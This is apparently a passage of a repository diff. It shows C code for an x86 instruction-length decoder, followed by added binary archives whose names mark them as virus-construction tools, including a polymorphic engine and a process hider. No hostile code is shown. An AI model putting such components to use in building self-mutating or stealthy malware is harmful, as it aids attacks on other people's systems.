Prefix,ModRMn,Prefix,Prefix,ModRMn,ModRMn,ModRMy+Imm08,ModRMy+Imm32, /* F0..F7 */
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMy,ModRMy /* F8..FF */
};
int main()
{
unsigned char *ptr,Mod;
ptr = Array;
int OperandSize = 4,OpcodeSize = 0,Displacement = 4;
DecodePrefixes:
if(ModRMTable[*ptr] == Prefix) {
if (*ptr == 0x66) { OpcodeSize += 1; OperandSize -= 2; } else { OpcodeSize += 1; }
ptr++;
goto DecodePrefixes;
}
OpcodeSize += 1; /* because of the opcode */
if (ModRMTable[*ptr] == Imm08+ModRMy || ModRMTable[*ptr] == Imm08 ) { OpcodeSize += 1; } /*is there a 8 bit Imm */
if (ModRMTable[*ptr] == Imm32+ModRMy || ModRMTable[*ptr] == Imm32 ) { OpcodeSize += OperandSize; } /* is there a 16 or 32 bit imm */
if (ModRMTable[*ptr] == ModRMy || ModRMTable[*ptr] == ModRMy+Imm08 || ModRMTable[*ptr] == ModRMy+Imm32) { /* is there a ModR/M Byte */
OpcodeSize += 1; ptr++; /*read the ModR/M Byte */ goto DecodeMod; }
else { printf ("The Opcode Size Is: %d\n",OpcodeSize); return 0; }
/*Decode ModR/M Byte */
DecodeMod:
Mod = *ptr;
if((Mod >= 0x00 && Mod <= 0x3F) || (Mod >= 0xC0 && Mod <= 0xFF)) { Displacement -= 4; }
if(Mod >= 0x40 && Mod <= 0x7F) { Displacement -= 3; }
OpcodeSize += Displacement;
if((Mod%0x10 == 4) || (Mod%0x10 == 0x0C)) { OpcodeSize += 1;} /* does it have SIB ? */
if(Mod <= 0x3D) { if((Mod%0x10 == 0x05) || (Mod%0x10 == 0x0D)){ OpcodeSize += 4; } }/* is it direct addresation? */
printf ("The Opcode Size Is: %d\n",OpcodeSize);
return 0;
}

BIN
libs/VirTool.Win32.Disassembler.Xde.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.Win32.Nmpe.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.Win32.Poly.Prcg.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.Win32.ProcessHide.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.Win32.Tunnel.7z Normal file
View File

Binary file not shown.